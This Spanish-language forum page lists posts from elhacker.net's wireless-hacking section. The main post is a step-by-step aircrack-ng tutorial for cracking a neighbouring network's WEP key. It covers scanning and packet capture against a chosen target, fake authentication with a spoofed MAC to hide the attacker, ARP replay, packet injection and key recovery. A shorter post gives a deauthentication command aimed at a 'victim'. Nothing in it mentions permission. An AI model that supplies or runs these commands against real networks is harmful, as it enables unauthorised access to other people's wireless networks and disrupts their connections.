elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Wireless en Linux / Re: Canal... ¿-1? (Ubuntu 10.10) en: 17 Diciembre 2010, 23:44 pm
-a victima seria tu  -c asociado esta claro
2  Seguridad Informática / Wireless en Linux / Re: Canal... ¿-1? (Ubuntu 10.10) en: 17 Diciembre 2010, 23:41 pm

Pongo lo de "aireplay-ng -1 0 - a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx (interface)"
                                                                                                                              prueba esto y me cuentas:                   

aireplay-ng -0 20 -a xx:xx:xx:xx::xx:xx -c xx:xx:xx:xx:xx:xx interface
3  Seguridad Informática / Wireless en Linux / Re: Hacking Wireless Linux con Broadcom BCM4312 802.11b/g (14e4:4315) en: 4 Agosto 2010, 17:47 pm
Empezamos: Antes de nada tenemos que asegurarnos de que nuestro nucleo tiene compatibilidad con nuestro dispositivo wifi, para saber que nucleo tenemos abrimos un terminal y ejecutamos

$ uname -a

Esto nos dara la info de nuestro equipo. En el caso de que no funcione nuestra tarjeta wifi tendremos que mirar por internet a ver qué chip tiene e instalar el driver adecuado.

Una vez vemos que nuestro equipo es capaz de conectar a una red wifi conocida continuaremos. Tras haber configurado la red wifi debemos saber qué interface tiene:

$ iwconfig

De la lista que sale buscamos la interfaz que corresponda al wifi. (puedes usar también el comando ifconfig -a) A partir de aqui supongo que se llama "eth1".

Ahora bajarmos Aircrack y lo compilamos. Antes de descargarlo hay que instalar sus dependencias:

# apt-get install build-essential

despues a compilar:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
$ tar -zxvf aircrack-ng-1.0-rc1.tar.gz
$ cd aircrack-ng-1.0-rc1
$ make
$ sudo make install



2º) Cómo usar Aircrack

Una vez tenemos en nuestras manos este programita ya podemos empezar...
Abrimos un terminal de comandos, lo recomendable es operar en él como root para que no tengamos que ir poniendo "sudo" antes de cada cada orden, esto se hace con el comando:

$ sudo su

Lo primero es ver las redes wifi a las que tenemos acceso:

# airodump-ng eth1

Consejos:
- Sustituye "eth1" por la interface de tu tarjeta wireless (mira cuál es con el comando iwconfig).
- Si te da un error del tipo "resource busy" significa que estás conectado a otra red wifi. Para que funcione simplemente desconectate de la red.

Una vez hecho esto nos sacara algo asi:

CH 14 ][ Elapsed: 1 min ][ 2008-11-26 19:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:00:00:00:00:00 4 43 0 0 11 54. WEP WEP josewifi
11:11:11:11:11:11 64 8 0 14 54. WEP WEP juan

BSSID STATION PWR Rate Lost Packets Probes a

En este caso tenemos 2 redes a elegir, nos fijamos en la red 'josewifi' con una MAC de 00:00:00:00:00:00 en el canal CH 11. Suponiendo que este es nuestro objetivo nos fijamos en que tenga modo de encriptacion WEP.

Consejos:
- Para que airodump deje de actualizar los datos pulsa "Cntrol+C".
- Puedes hacer búsquedas más detalladas usando las opciones que aparecen al ejecutar "airodump --help"

Ahora que ya tenemos fijado un objetivo lo que vamos a hacer es capturar Data y Beacons para luego lanzar aircrack-ng y descifrar su clave WEP.

1- Lanzamos airodump-ng para que capture paquetes:

$ airodump-ng --channel 11 --bssid 00:00:00:00:00:00 -w captura eth1

Ahora lo dejamos corriendo durante todo el rato para que vaya capturando en el archivo "captura-01.cap", que guardará en la carpeta en la que estés trabajando (generalmente en tu carpeta de usuario).

2- (los pasos 2, 3 y 4 son opcionales) Nos vamos a identificar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.

# aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

en la opcion -h ocultamos nuestra MAC con una introducida (inventada) por nosotros

Nos deberia decir: Association successful :-)

3- ARP-request replay. Abrimos otra consola y

# aireplay-ng -3 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

este tambien lo dejamos correr mientras que trabajamos.

4- Inyectar trafico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y nucleo de nuestro equipo. Esto nos permitira acelerar notablemente el proceso de captura de paquetes.

# aireplay-ng -2 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -r captura-01.cap eth1

5- Lanzar aircrack-ng para descifrar la contraseña:

# aircrack-ng -a 1 -e josewifi -b 00:00:00:00:00:00 captura-01.cap

El argumento "-a 1" indica que estamos descifrando una contraseña WEP, para descifrar una WAP deberiamos poner "-a 2".

Aircrack-ng tambien se debe dejar correr de fondo mientras se capturan paquetes porque ira intentando descifrar la clave segun vaya consiguiendo nuevos paquetes.

¡Y ya está! Una vez tengamos practica podremos crackear una contraseña WEP en unos 15 minutos.



C. Crackear contraseñas usando Aircrack y BackTrack
BackTrack
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines